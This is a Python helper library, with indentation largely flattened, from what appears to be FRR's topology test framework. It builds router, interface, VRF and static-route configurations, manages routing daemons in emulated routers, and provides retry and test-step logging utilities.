def set_seq_id(obj_type, router, id, obj_name):
"""
Saves sequence number if not auto-generated and given by user
Parameters
----------
* `obj_type`: prefix_lists or route_maps
* `router`: router name
    * `obj_name`: name of the prefix-list or route-map
"""
router_data = SEQ_ID[obj_type].setdefault(router, {})
obj_data = router_data.setdefault(obj_name, {})
seq_id = obj_data.setdefault("seq_id", 0)
seq_id = int(seq_id) + int(id)
obj_data["seq_id"] = seq_id
class InvalidCLIError(Exception):
"""Raise when the CLI command is wrong"""
pass
def run_frr_cmd(rnode, cmd, isjson=False):
"""
    Execute frr show commands in privileged mode
* `rnode`: router node on which commands needs to executed
* `cmd`: Command to be executed on frr
* `isjson`: If command is to get json data or not
:return str:
"""
if cmd:
ret_data = rnode.vtysh_cmd(cmd, isjson=isjson)
if True:
if isjson:
logger.debug(ret_data)
print_data = rnode.vtysh_cmd(cmd.rstrip("json"), isjson=False)
else:
print_data = ret_data
logger.info(
"Output for command [ %s] on router %s:\n%s",
cmd.rstrip("json"),
rnode.name,
print_data,
)
return ret_data
else:
raise InvalidCLIError("No actual cmd passed")
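# Typical call (rnode comes from tgen.routers(); the command is an example):
#   output = run_frr_cmd(rnode, "show ip bgp summary json", isjson=True)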
def apply_raw_config(tgen, input_dict):
"""
    API to configure raw configuration on device. This can be used for any CLI
    which has not been implemented in JSON.
Parameters
----------
    * `tgen`: tgen object
* `input_dict`: configuration that needs to be applied
Usage
-----
input_dict = {
"r2": {
"raw_config": [
"router bgp",
"no bgp update-group-split-horizon"
]
}
}
Returns
-------
True or errormsg
"""
result = True
for router_name in input_dict.keys():
config_cmd = input_dict[router_name]["raw_config"]
if not isinstance(config_cmd, list):
config_cmd = [config_cmd]
frr_cfg_file = "{}/{}/{}".format(TMPDIR, router_name, FRRCFG_FILE)
with open(frr_cfg_file, "w") as cfg:
for cmd in config_cmd:
cfg.write("{}\n".format(cmd))
result = load_config_to_router(tgen, router_name)
return result
def create_common_configuration(
tgen, router, data, config_type=None, build=False, load_config=True
):
"""
API to create object of class FRRConfig and also create frr_json.conf
file. It will create interface and common configurations and save it to
frr_json.conf and load to router
Parameters
----------
    * `tgen`: tgen object
    * `data`: Configuration data saved in a list.
* `router` : router id to be configured.
    * `config_type` : Syntactic information while writing configuration. Should
       be one of the values mentioned in the config_map below.
* `build` : Only for initial setup phase this is set as True
Returns
-------
True or False
"""
TMPDIR = os.path.join(LOGDIR, tgen.modname)
fname = "{}/{}/{}".format(TMPDIR, router, FRRCFG_FILE)
config_map = OrderedDict(
{
"general_config": "! FRR General Config\n",
"interface_config": "! Interfaces Config\n",
"static_route": "! Static Route Config\n",
"prefix_list": "! Prefix List Config\n",
"bgp_community_list": "! Community List Config\n",
"route_maps": "! Route Maps Config\n",
"bgp": "! BGP Config\n",
"vrf": "! VRF Config\n",
}
)
if build:
mode = "a"
elif not load_config:
mode = "a"
else:
mode = "w"
try:
frr_cfg_fd = open(fname, mode)
if config_type:
frr_cfg_fd.write(config_map[config_type])
for line in data:
frr_cfg_fd.write("{} \n".format(str(line)))
frr_cfg_fd.write("\n")
except IOError as err:
logger.error(
"Unable to open FRR Config File. error(%s): %s" % (err.errno, err.strerror)
)
return False
finally:
frr_cfg_fd.close()
    # If configuration applied from build, it will be done at last
if not build and load_config:
load_config_to_router(tgen, router)
return True
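# Sketch of a typical call (router name and config lines are examples):
#   data = ["interface r1-r2-eth0", "ip address 10.0.0.1/24"]
#   create_common_configuration(tgen, "r1", data,
#                               config_type="interface_config")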
def kill_router_daemons(tgen, router, daemons):
"""
    Router's current config would be saved to /etc/frr/ for each daemon
    and the daemon would be killed forcefully using SIGKILL.
* `tgen` : topogen object
* `router`: Device under test
* `daemons`: list of daemons to be killed
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
try:
router_list = tgen.routers()
# Saving router config to /etc/frr, which will be loaded to router
# when it starts
router_list[router].vtysh_cmd("write memory")
# Kill Daemons
result = router_list[router].killDaemons(daemons)
if len(result) > 0:
assert "Errors found post shutdown - details follow:" == 0, result
return result
except Exception as e:
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
def start_router_daemons(tgen, router, daemons):
"""
Daemons defined by user would be started
* `tgen` : topogen object
* `router`: Device under test
    * `daemons`: list of daemons to be started
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
try:
router_list = tgen.routers()
# Start daemons
result = router_list[router].startDaemons(daemons)
return result
except Exception as e:
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def kill_mininet_routers_process(tgen):
"""
    Kill all stale mininet router processes
* `tgen` : topogen object
"""
router_list = tgen.routers()
for rname, router in router_list.iteritems():
daemon_list = [
"zebra",
"ospfd",
"ospf6d",
"bgpd",
"ripd",
"ripngd",
"isisd",
"pimd",
"ldpd",
"staticd",
]
for daemon in daemon_list:
router.run("killall -9 {}".format(daemon))
def check_router_status(tgen):
"""
Check if all daemons are running for all routers in topology
* `tgen` : topogen object
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
try:
router_list = tgen.routers()
for router, rnode in router_list.iteritems():
result = rnode.check_router_running()
if result != "":
daemons = []
if "bgpd" in result:
daemons.append("bgpd")
if "zebra" in result:
daemons.append("zebra")
rnode.startDaemons(daemons)
except Exception as e:
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def reset_config_on_routers(tgen, routerName=None):
"""
Resets configuration on routers to the snapshot created using input JSON
file. It replaces existing router configuration with FRRCFG_BKUP_FILE
Parameters
----------
* `tgen` : Topogen object
* `routerName` : router config is to be reset
"""
logger.debug("Entering API: reset_config_on_routers")
router_list = tgen.routers()
for rname in ROUTER_LIST:
if routerName and routerName != rname:
continue
router = router_list[rname]
logger.info("Configuring router %s to initial test configuration", rname)
cfg = router.run("vtysh -c 'show running'")
fname = "{}/{}/frr.sav".format(TMPDIR, rname)
dname = "{}/{}/delta.conf".format(TMPDIR, rname)
f = open(fname, "w")
for line in cfg.split("\n"):
line = line.strip()
if (
line == "Building configuration..."
or line == "Current configuration:"
or not line
):
continue
f.write(line)
f.write("\n")
f.close()
run_cfg_file = "{}/{}/frr.sav".format(TMPDIR, rname)
init_cfg_file = "{}/{}/frr_json_initial.conf".format(TMPDIR, rname)
command = "/usr/lib/frr/frr-reload.py --input {} --test {} > {}".format(
run_cfg_file, init_cfg_file, dname
)
result = call(command, shell=True, stderr=SUB_STDOUT, stdout=SUB_PIPE)
# Assert if command fail
if result > 0:
logger.error("Delta file creation failed. Command executed %s", command)
with open(run_cfg_file, "r") as fd:
logger.info(
"Running configuration saved in %s is:\n%s", run_cfg_file, fd.read()
)
with open(init_cfg_file, "r") as fd:
logger.info(
"Test configuration saved in %s is:\n%s", init_cfg_file, fd.read()
)
err_cmd = ["/usr/bin/vtysh", "-m", "-f", run_cfg_file]
result = Popen(err_cmd, stdout=SUB_PIPE, stderr=SUB_PIPE)
output = result.communicate()
for out_data in output:
temp_data = out_data.decode("utf-8").lower()
for out_err in ERROR_LIST:
if out_err.lower() in temp_data:
logger.error(
"Found errors while validating data in" " %s", run_cfg_file
)
raise InvalidCLIError(out_data)
raise InvalidCLIError("Unknown error in %s", output)
f = open(dname, "r")
delta = StringIO.StringIO()
delta.write("configure terminal\n")
t_delta = f.read()
# Don't disable debugs
check_debug = True
for line in t_delta.split("\n"):
line = line.strip()
if line == "Lines To Delete" or line == "===============" or not line:
continue
if line == "Lines To Add":
check_debug = False
continue
if line == "============" or not line:
continue
# Leave debugs and log output alone
if check_debug:
if "debug" in line or "log file" in line:
continue
delta.write(line)
delta.write("\n")
f.close()
delta.write("end\n")
output = router.vtysh_multicmd(delta.getvalue(), pretty_output=False)
delta.close()
delta = StringIO.StringIO()
cfg = router.run("vtysh -c 'show running'")
for line in cfg.split("\n"):
line = line.strip()
delta.write(line)
delta.write("\n")
# Router current configuration to log file or console if
# "show_router_config" is defined in "pytest.ini"
if show_router_config:
logger.info("Configuration on router {} after reset:".format(rname))
logger.info(delta.getvalue())
delta.close()
logger.debug("Exiting API: reset_config_on_routers")
return True
def load_config_to_router(tgen, routerName, save_bkup=False):
"""
Loads configuration on router from the file FRRCFG_FILE.
Parameters
----------
* `tgen` : Topogen object
* `routerName` : router for which configuration to be loaded
* `save_bkup` : If True, Saves snapshot of FRRCFG_FILE to FRRCFG_BKUP_FILE
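    Usage
    -----
    # Illustrative example; pushes whatever was staged in FRRCFG_FILE for
    # router "r1" (an assumed name) and keeps a backup snapshot:
    result = load_config_to_router(tgen, "r1", save_bkup=True)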
"""
logger.debug("Entering API: load_config_to_router")
router_list = tgen.routers()
for rname in ROUTER_LIST:
if routerName and rname != routerName:
continue
router = router_list[rname]
try:
frr_cfg_file = "{}/{}/{}".format(TMPDIR, rname, FRRCFG_FILE)
frr_cfg_bkup = "{}/{}/{}".format(TMPDIR, rname, FRRCFG_BKUP_FILE)
with open(frr_cfg_file, "r+") as cfg:
data = cfg.read()
logger.info(
"Applying following configuration on router"
" {}:\n{}".format(rname, data)
)
if save_bkup:
with open(frr_cfg_bkup, "w") as bkup:
bkup.write(data)
output = router.vtysh_multicmd(data, pretty_output=False)
for out_err in ERROR_LIST:
if out_err.lower() in output.lower():
raise InvalidCLIError("%s" % output)
cfg.truncate(0)
except IOError as err:
errormsg = (
"Unable to open config File. error(%s):" " %s",
(err.errno, err.strerror),
)
return errormsg
# Router current configuration to log file or console if
# "show_router_config" is defined in "pytest.ini"
if show_router_config:
logger.info("New configuration for router {}:".format(rname))
new_config = router.run("vtysh -c 'show running'")
logger.info(new_config)
logger.debug("Exiting API: load_config_to_router")
return True
def get_frr_ipv6_linklocal(tgen, router, intf=None, vrf=None):
"""
    API to get the link-local ipv6 address of a particular interface using
    FRR command 'show interface'
    * `tgen`: tgen object
    * `router` : router from which interface link-local addresses should be
    fetched
* `intf` : interface for which linklocal address needs to be taken
* `vrf` : VRF name
Usage
-----
    linklocal = get_frr_ipv6_linklocal(tgen, router, "intf1", "RED_A")
Returns
-------
    1) array of [interface, link-local ip] pairs, or a single link-local
    address string when `intf` is given.
"""
router_list = tgen.routers()
for rname, rnode in router_list.iteritems():
if rname != router:
continue
linklocal = []
if vrf:
cmd = "show interface vrf {}".format(vrf)
else:
cmd = "show interface"
ifaces = router_list[router].run('vtysh -c "{}"'.format(cmd))
# Fix newlines (make them all the same)
ifaces = ("\n".join(ifaces.splitlines()) + "\n").splitlines()
interface = None
ll_per_if_count = 0
for line in ifaces:
# Interface name
m = re_search("Interface ([a-zA-Z0-9-]+) is", line)
if m:
interface = m.group(1).split(" ")[0]
ll_per_if_count = 0
# Interface ip
m1 = re_search("inet6 (fe80[:a-fA-F0-9]+[\/0-9]+)", line)
if m1:
local = m1.group(1)
ll_per_if_count += 1
if ll_per_if_count > 1:
linklocal += [["%s-%s" % (interface, ll_per_if_count), local]]
else:
linklocal += [[interface, local]]
if linklocal:
if intf:
return [_linklocal[1] for _linklocal in linklocal if _linklocal[0] == intf][
0
].split("/")[0]
return linklocal
else:
errormsg = "Link local ip missing on router {}"
return errormsg
def generate_support_bundle():
"""
    API to generate support bundle on any verification step failure.
    It runs a python utility, /usr/lib/frr/generate_support_bundle.py,
    which basically runs defined CLIs and dumps the data to a specified location
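    Usage
    -----
    # Illustrative example; normally invoked from a verification API once
    # the final retry attempt has failed:
    generate_support_bundle()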
"""
tgen = get_topogen()
router_list = tgen.routers()
test_name = sys._getframe(2).f_code.co_name
TMPDIR = os.path.join(LOGDIR, tgen.modname)
for rname, rnode in router_list.iteritems():
logger.info("Generating support bundle for {}".format(rname))
rnode.run("mkdir -p /var/log/frr")
bundle_log = rnode.run("python2 /usr/lib/frr/generate_support_bundle.py")
logger.info(bundle_log)
dst_bundle = "{}/{}/support_bundles/{}".format(TMPDIR, rname, test_name)
src_bundle = "/var/log/frr"
rnode.run("rm -rf {}".format(dst_bundle))
rnode.run("mkdir -p {}".format(dst_bundle))
rnode.run("mv -f {}/* {}".format(src_bundle, dst_bundle))
return True
def start_topology(tgen):
"""
    Start topology, create tmp files which are loaded to routers
    to start daemons, and then start the routers
* `tgen` : topogen object
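    Usage
    -----
    # Illustrative example; typically called from a pytest setup hook with
    # a freshly built Topogen object:
    start_topology(tgen)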
"""
global TMPDIR, ROUTER_LIST
# Starting topology
tgen.start_topology()
# Starting deamons
router_list = tgen.routers()
ROUTER_LIST = sorted(
router_list.keys(), key=lambda x: int(re_search("\d+", x).group(0))
)
TMPDIR = os.path.join(LOGDIR, tgen.modname)
router_list = tgen.routers()
for rname in ROUTER_LIST:
router = router_list[rname]
# It will help in debugging the failures, will give more details on which
# specific kernel version tests are failing
linux_ver = router.run("uname -a")
logger.info("Logging platform related details: \n %s \n", linux_ver)
try:
os.chdir(TMPDIR)
# Creating router named dir and empty zebra.conf bgpd.conf files
# inside the current directory
            if os.path.isdir("{}".format(rname)):
                os.system("rm -rf {}".format(rname))
            os.mkdir("{}".format(rname))
            os.system("chmod -R go+rw {}".format(rname))
            os.chdir("{}/{}".format(TMPDIR, rname))
            os.system("touch zebra.conf bgpd.conf")
        except IOError as err:
            logger.error("I/O error({0}): {1}".format(err.errno, err.strerror))
# Loading empty zebra.conf file to router, to start the zebra deamon
router.load_config(
TopoRouter.RD_ZEBRA, "{}/{}/zebra.conf".format(TMPDIR, rname)
)
# Loading empty bgpd.conf file to router, to start the bgp deamon
router.load_config(TopoRouter.RD_BGP, "{}/{}/bgpd.conf".format(TMPDIR, rname))
# Starting routers
logger.info("Starting all routers once topology is created")
tgen.start_router()
def stop_router(tgen, router):
"""
Router"s current config would be saved to /etc/frr/ for each deamon
and router and its deamons would be stopped.
* `tgen` : topogen object
* `router`: Device under test
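    Usage
    -----
    # Illustrative example; router name "r1" is an assumption:
    stop_router(tgen, "r1")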
"""
router_list = tgen.routers()
# Saving router config to /etc/frr, which will be loaded to router
# when it starts
router_list[router].vtysh_cmd("write memory")
# Stop router
router_list[router].stop()
def start_router(tgen, router):
"""
    Router will be started and config would be loaded from /etc/frr/ for each
    daemon
* `tgen` : topogen object
* `router`: Device under test
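    Usage
    -----
    # Illustrative example; router name "r1" is an assumption:
    result = start_router(tgen, "r1")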
"""
logger.debug("Entering lib API: start_router")
try:
router_list = tgen.routers()
        # Router and its daemons would be started and config would
        # be loaded to router for each daemon from /etc/frr
router_list[router].start()
# Waiting for router to come up
sleep(5)
except Exception as e:
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: start_router()")
return True
def number_to_row(routerName):
"""
Returns the number for the router.
Calculation based on name a0 = row 0, a1 = row 1, b2 = row 2, z23 = row 23
etc
"""
return int(routerName[1:])
def number_to_column(routerName):
"""
Returns the number for the router.
    Calculation based on name a0 = column 0, a1 = column 0, b2 = column 1,
    z23 = column 25 etc
"""
return ord(routerName[0]) - 97
#############################################
# Common APIs, will be used by all protocols
#############################################
def create_vrf_cfg(tgen, topo, input_dict=None, build=False):
"""
Create vrf configuration for created topology. VRF
configuration is provided in input json file.
VRF config is done in Linux Kernel:
* Create VRF
* Attach interface to VRF
* Bring up VRF
Parameters
----------
* `tgen` : Topogen object
* `topo` : json file data
* `input_dict` : Input dict data, required when configuring
from testcase
* `build` : Only for initial setup phase this is set as True.
Usage
-----
input_dict={
"r3": {
"links": {
"r2-link1": {"ipv4": "auto", "ipv6": "auto", "vrf": "RED_A"},
"r2-link2": {"ipv4": "auto", "ipv6": "auto", "vrf": "RED_B"},
"r2-link3": {"ipv4": "auto", "ipv6": "auto", "vrf": "BLUE_A"},
"r2-link4": {"ipv4": "auto", "ipv6": "auto", "vrf": "BLUE_B"},
},
"vrfs":[
{
"name": "RED_A",
"id": "1"
},
{
"name": "RED_B",
"id": "2"
},
{
"name": "BLUE_A",
"id": "3",
"delete": True
},
{
"name": "BLUE_B",
"id": "4"
}
]
}
}
result = create_vrf_cfg(tgen, topo, input_dict)
Returns
-------
True or False
"""
result = True
if not input_dict:
input_dict = deepcopy(topo)
else:
input_dict = deepcopy(input_dict)
try:
for c_router, c_data in input_dict.iteritems():
rnode = tgen.routers()[c_router]
if "vrfs" in c_data:
for vrf in c_data["vrfs"]:
config_data = []
del_action = vrf.setdefault("delete", False)
name = vrf.setdefault("name", None)
table_id = vrf.setdefault("id", None)
vni = vrf.setdefault("vni", None)
del_vni = vrf.setdefault("no_vni", None)
if del_action:
                        # Kernel cmd - Delete VRF and its table
cmd = "ip link del {} type vrf table {}".format(
vrf["name"], vrf["id"]
)
logger.info("[DUT: %s]: Running kernel cmd [%s]", c_router, cmd)
rnode.run(cmd)
# Kernel cmd - Bring down VRF
cmd = "ip link set dev {} down".format(name)
logger.info("[DUT: %s]: Running kernel cmd [%s]", c_router, cmd)
rnode.run(cmd)
else:
if name and table_id:
# Kernel cmd- Add VRF and table
cmd = "ip link add {} type vrf table {}".format(
name, table_id
)
logger.info(
"[DUT: %s]: Running kernel cmd " "[%s]", c_router, cmd
)
rnode.run(cmd)
# Kernel cmd - Bring up VRF
cmd = "ip link set dev {} up".format(name)
logger.info(
"[DUT: %s]: Running kernel " "cmd [%s]", c_router, cmd
)
rnode.run(cmd)
if "links" in c_data:
for destRouterLink, data in sorted(
c_data["links"].iteritems()
):
# Loopback interfaces
if "type" in data and data["type"] == "loopback":
interface_name = destRouterLink
else:
interface_name = data["interface"]
if "vrf" in data:
vrf_list = data["vrf"]
if type(vrf_list) is not list:
vrf_list = [vrf_list]
for _vrf in vrf_list:
cmd = "ip link set {} master {}".format(
interface_name, _vrf
)
logger.info(
"[DUT: %s]: Running" " kernel cmd [%s]",
c_router,
cmd,
)
rnode.run(cmd)
if vni:
config_data.append("vrf {}".format(vrf["name"]))
cmd = "vni {}".format(vni)
config_data.append(cmd)
if del_vni:
config_data.append("vrf {}".format(vrf["name"]))
cmd = "no vni {}".format(del_vni)
config_data.append(cmd)
result = create_common_configuration(
tgen, c_router, config_data, "vrf", build=build
)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
return result
def create_interface_in_kernel(
tgen, dut, name, ip_addr, vrf=None, netmask=None, create=True
):
"""
    Create interfaces in kernel for ipv4/ipv6
Config is done in Linux Kernel:
Parameters
----------
* `tgen` : Topogen object
* `dut` : Device for which interfaces to be added
* `name` : interface name
* `ip_addr` : ip address for interface
* `vrf` : VRF name, to which interface will be associated
* `netmask` : netmask value, default is None
    * `create`: Create the interface in the kernel; set to False if the
    interface already exists
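    Usage
    -----
    # Illustrative example; the interface name, address, netmask and VRF
    # are assumptions:
    create_interface_in_kernel(
        tgen, "r1", "lo10", "10.0.0.1", vrf="RED_A", netmask="255.255.255.0"
    )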
"""
rnode = tgen.routers()[dut]
if create:
cmd = "sudo ip link add name {} type dummy".format(name)
rnode.run(cmd)
addr_type = validate_ip_address(ip_addr)
if addr_type == "ipv4":
cmd = "ifconfig {} {} netmask {}".format(name, ip_addr, netmask)
else:
cmd = "ifconfig {} inet6 add {}/{}".format(name, ip_addr, netmask)
rnode.run(cmd)
if vrf:
cmd = "ip link set {} master {}".format(name, vrf)
rnode.run(cmd)
def shutdown_bringup_interface_in_kernel(tgen, dut, intf_name, ifaceaction=False):
"""
    Shut down or bring up an interface in the kernel
    Config is done in Linux Kernel:
Parameters
----------
* `tgen` : Topogen object
* `dut` : Device for which interfaces to be added
* `intf_name` : interface name
    * `ifaceaction` : False to shutdown and True to bring up the
    interface
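    Usage
    -----
    # Illustrative example; shuts down an assumed interface "r1-r2-eth0":
    shutdown_bringup_interface_in_kernel(tgen, "r1", "r1-r2-eth0", False)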
"""
rnode = tgen.routers()[dut]
cmd = "ip link set dev"
if ifaceaction:
action = "up"
cmd = "{} {} {}".format(cmd, intf_name, action)
else:
action = "down"
cmd = "{} {} {}".format(cmd, intf_name, action)
logger.info("[DUT: %s]: Running command: %s", dut, cmd)
rnode.run(cmd)
def validate_ip_address(ip_address):
"""
Validates the type of ip address
Parameters
----------
* `ip_address`: IPv4/IPv6 address
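    Usage
    -----
    validate_ip_address("10.0.0.1")      # returns "ipv4"
    validate_ip_address("fd00::1/64")    # returns "ipv6"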
Returns
-------
Type of address as string
"""
if "/" in ip_address:
ip_address = ip_address.split("/")[0]
v4 = True
v6 = True
try:
socket.inet_aton(ip_address)
except socket.error as error:
logger.debug("Not a valid IPv4 address")
v4 = False
else:
return "ipv4"
try:
socket.inet_pton(socket.AF_INET6, ip_address)
except socket.error as error:
logger.debug("Not a valid IPv6 address")
v6 = False
else:
return "ipv6"
if not v4 and not v6:
raise Exception(
"InvalidIpAddr", "%s is neither valid IPv4 or IPv6" " address" % ip_address
)
def check_address_types(addr_type=None):
"""
Checks environment variable set and compares with the current address type
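    Usage
    -----
    # Returns the enabled address families when called without arguments:
    for addr_type in check_address_types():  # e.g. ["ipv4", "ipv6"]
        pass
    # Or checks a single family:
    if check_address_types("ipv6"):
        pass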
"""
addr_types_env = os.environ.get("ADDRESS_TYPES")
if not addr_types_env:
addr_types_env = "dual"
if addr_types_env == "dual":
addr_types = ["ipv4", "ipv6"]
elif addr_types_env == "ipv4":
addr_types = ["ipv4"]
elif addr_types_env == "ipv6":
addr_types = ["ipv6"]
if addr_type is None:
return addr_types
if addr_type not in addr_types:
logger.debug(
"{} not in supported/configured address types {}".format(
addr_type, addr_types
)
)
return False
return True
def generate_ips(network, no_of_ips):
"""
    Returns a list of IPs, generated starting from the given network(s).
    * `network` : network address (or list of networks, each with a mask);
    generation of IPs starts from here
    * `no_of_ips` : number of IPs to generate per network
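    Usage
    -----
    # Illustrative example; returns ["10.0.0.0/30", "10.0.0.4/30",
    # "10.0.0.8/30", "10.0.0.12/30"]:
    ip_list = generate_ips("10.0.0.0/30", 4)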
"""
ipaddress_list = []
if type(network) is not list:
network = [network]
for start_ipaddr in network:
if "/" in start_ipaddr:
start_ip = start_ipaddr.split("/")[0]
mask = int(start_ipaddr.split("/")[1])
addr_type = validate_ip_address(start_ip)
if addr_type == "ipv4":
start_ip = ipaddress.IPv4Address(unicode(start_ip))
step = 2 ** (32 - mask)
if addr_type == "ipv6":
start_ip = ipaddress.IPv6Address(unicode(start_ip))
step = 2 ** (128 - mask)
next_ip = start_ip
count = 0
while count < no_of_ips:
ipaddress_list.append("{}/{}".format(next_ip, mask))
if addr_type == "ipv6":
next_ip = ipaddress.IPv6Address(int(next_ip) + step)
else:
next_ip += step
count += 1
return ipaddress_list
def find_interface_with_greater_ip(topo, router, loopback=True, interface=True):
"""
Returns highest interface ip for ipv4/ipv6. If loopback is there then
it will return highest IP from loopback IPs otherwise from physical
interface IPs.
* `topo` : json file data
    * `router` : router for which the highest interface IP should be calculated
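    Usage
    -----
    # Illustrative example; `topo` is the loaded topology JSON and "r1"
    # is an assumed router name:
    highest_ip = find_interface_with_greater_ip(topo, "r1")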
"""
link_data = topo["routers"][router]["links"]
lo_list = []
interfaces_list = []
lo_exists = False
for destRouterLink, data in sorted(link_data.iteritems()):
if loopback:
if "type" in data and data["type"] == "loopback":
lo_exists = True
ip_address = topo["routers"][router]["links"][destRouterLink][
"ipv4"
].split("/")[0]
lo_list.append(ip_address)
if interface:
ip_address = topo["routers"][router]["links"][destRouterLink]["ipv4"].split(
"/"
)[0]
interfaces_list.append(ip_address)
if lo_exists:
return sorted(lo_list)[-1]
return sorted(interfaces_list)[-1]
def write_test_header(tc_name):
""" Display message at beginning of test case"""
count = 20
logger.info("*" * (len(tc_name) + count))
step("START -> Testcase : %s" % tc_name, reset=True)
logger.info("*" * (len(tc_name) + count))
def write_test_footer(tc_name):
""" Display message at end of test case"""
count = 21
logger.info("=" * (len(tc_name) + count))
logger.info("Testcase : %s -> PASSED", tc_name)
logger.info("=" * (len(tc_name) + count))
def interface_status(tgen, topo, input_dict):
"""
    Shut down or bring up interfaces on a device
* `tgen` : Topogen object
* `topo` : json file data
* `input_dict` : for which router, route map has to be deleted
Usage
-----
input_dict = {
"r3": {
"interface_list": ['eth1-r1-r2', 'eth2-r1-r3'],
"status": "down"
}
}
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
try:
for router in input_dict.keys():
interface_list = input_dict[router]["interface_list"]
status = input_dict[router].setdefault("status", "up")
for intf in interface_list:
rnode = tgen.routers()[router]
interface_set_status(rnode, intf, status)
# Load config to router
load_config_to_router(tgen, router)
except Exception as e:
# handle any exception
logger.error("Error %s occured. Arguments %s.", e.message, e.args)
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def retry(attempts=3, wait=2, return_is_str=True, initial_wait=0, return_is_dict=False):
"""
Retries function execution, if return is an errormsg or exception
* `attempts`: Number of attempts to make
* `wait`: Number of seconds to wait between each attempt
* `return_is_str`: Return val is an errormsg in case of failure
* `initial_wait`: Sleeps for this much seconds before executing function
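    Usage
    -----
    # Illustrative sketch; re-runs the decorated verification API up to
    # 3 times, pausing 2s between attempts, when it returns an errormsg:
    @retry(attempts=3, wait=2, return_is_str=True)
    def verify_something(tgen, input_dict):
        pass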
"""
def _retry(func):
@wraps(func)
def func_retry(*args, **kwargs):
_wait = kwargs.pop("wait", wait)
_attempts = kwargs.pop("attempts", attempts)
_attempts = int(_attempts)
if _attempts < 0:
raise ValueError("attempts must be 0 or greater")
if initial_wait > 0:
logger.info("Waiting for [%s]s as initial delay", initial_wait)
sleep(initial_wait)
_return_is_str = kwargs.pop("return_is_str", return_is_str)
            _return_is_dict = kwargs.pop("return_is_dict", return_is_dict)
for i in range(1, _attempts + 1):
try:
_expected = kwargs.setdefault("expected", True)
kwargs.pop("expected")
ret = func(*args, **kwargs)
logger.debug("Function returned %s" % ret)
if _return_is_str and isinstance(ret, bool) and _expected:
return ret
if (
isinstance(ret, str) or isinstance(ret, unicode)
) and _expected is False:
return ret
if _return_is_dict and isinstance(ret, dict):
return ret
if _attempts == i:
generate_support_bundle()
return ret
except Exception as err:
if _attempts == i:
generate_support_bundle()
logger.info("Max number of attempts (%r) reached", _attempts)
raise
else:
logger.info("Function returned %s", err)
if i < _attempts:
logger.info("Retry [#%r] after sleeping for %ss" % (i, _wait))
sleep(_wait)
func_retry._original = func
return func_retry
return _retry
class Stepper:
"""
Prints step number for the test case step being executed
"""
count = 1
def __call__(self, msg, reset):
if reset:
Stepper.count = 1
logger.info(msg)
else:
logger.info("STEP %s: '%s'", Stepper.count, msg)
Stepper.count += 1
def step(msg, reset=False):
"""
Call Stepper to print test steps. Need to reset at the beginning of test.
* ` msg` : Step message body.
* `reset` : Reset step count to 1 when set to True.
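    Usage
    -----
    step("START -> Testcase X", reset=True)  # resets counter, logs msg as-is
    step("Configure BGP on r1")              # logs "STEP 1: '...'"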
"""
_step = Stepper()
_step(msg, reset)
#############################################
# These APIs will be used by testcases
#############################################
def create_interfaces_cfg(tgen, topo, build=False):
"""
Create interface configuration for created topology. Basic Interface
configuration is provided in input json file.
Parameters
----------
* `tgen` : Topogen object
* `topo` : json file data
* `build` : Only for initial setup phase this is set as True.
Returns
-------
True or False
"""
result = False
topo = deepcopy(topo)
try:
for c_router, c_data in topo.iteritems():
interface_data = []
for destRouterLink, data in sorted(c_data["links"].iteritems()):
# Loopback interfaces
if "type" in data and data["type"] == "loopback":
interface_name = destRouterLink
else:
interface_name = data["interface"]
# Include vrf if present
if "vrf" in data:
interface_data.append(
"interface {} vrf {}".format(
str(interface_name), str(data["vrf"])
)
)
else:
interface_data.append("interface {}".format(str(interface_name)))
if "ipv4" in data:
intf_addr = c_data["links"][destRouterLink]["ipv4"]
if "delete" in data and data["delete"]:
interface_data.append("no ip address {}".format(intf_addr))
else:
interface_data.append("ip address {}".format(intf_addr))
if "ipv6" in data:
intf_addr = c_data["links"][destRouterLink]["ipv6"]
if "delete" in data and data["delete"]:
interface_data.append("no ipv6 address {}".format(intf_addr))
else:
interface_data.append("ipv6 address {}".format(intf_addr))
if "ipv6-link-local" in data:
intf_addr = c_data["links"][destRouterLink]["ipv6-link-local"]
if "delete" in data and data["delete"]:
interface_data.append("no ipv6 address {}".format(intf_addr))
else:
interface_data.append("ipv6 address {}\n".format(intf_addr))
result = create_common_configuration(
tgen, c_router, interface_data, "interface_config", build=build
)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
return result
def create_static_routes(tgen, input_dict, build=False):
"""
Create static routes for given router as defined in input_dict
Parameters
----------
* `tgen` : Topogen object
* `input_dict` : Input dict data, required when configuring from testcase
* `build` : Only for initial setup phase this is set as True.
Usage
-----
input_dict should be in the format below:
# static_routes: list of all routes
# network: network address
# no_of_ip: number of next-hop address that will be configured
# admin_distance: admin distance for route/routes.
# next_hop: starting next-hop address
# tag: tag id for static routes
# vrf: VRF name in which static routes needs to be created
# delete: True if config to be removed. Default False.
Example:
"routers": {
"r1": {
"static_routes": [
{
"network": "100.0.20.1/32",
"no_of_ip": 9,
"admin_distance": 100,
"next_hop": "10.0.0.1",
"tag": 4001,
"vrf": "RED_A"
"delete": true
}
]
}
}
Returns
-------
errormsg(str) or True
"""
result = False
logger.debug("Entering lib API: create_static_routes()")
input_dict = deepcopy(input_dict)
try:
for router in input_dict.keys():
if "static_routes" not in input_dict[router]:
errormsg = "static_routes not present in input_dict"
logger.info(errormsg)
continue
static_routes_list = []
static_routes = input_dict[router]["static_routes"]
for static_route in static_routes:
del_action = static_route.setdefault("delete", False)
no_of_ip = static_route.setdefault("no_of_ip", 1)
network = static_route.setdefault("network", [])
if type(network) is not list:
network = [network]
admin_distance = static_route.setdefault("admin_distance", None)
tag = static_route.setdefault("tag", None)
vrf = static_route.setdefault("vrf", None)
interface = static_route.setdefault("interface", None)
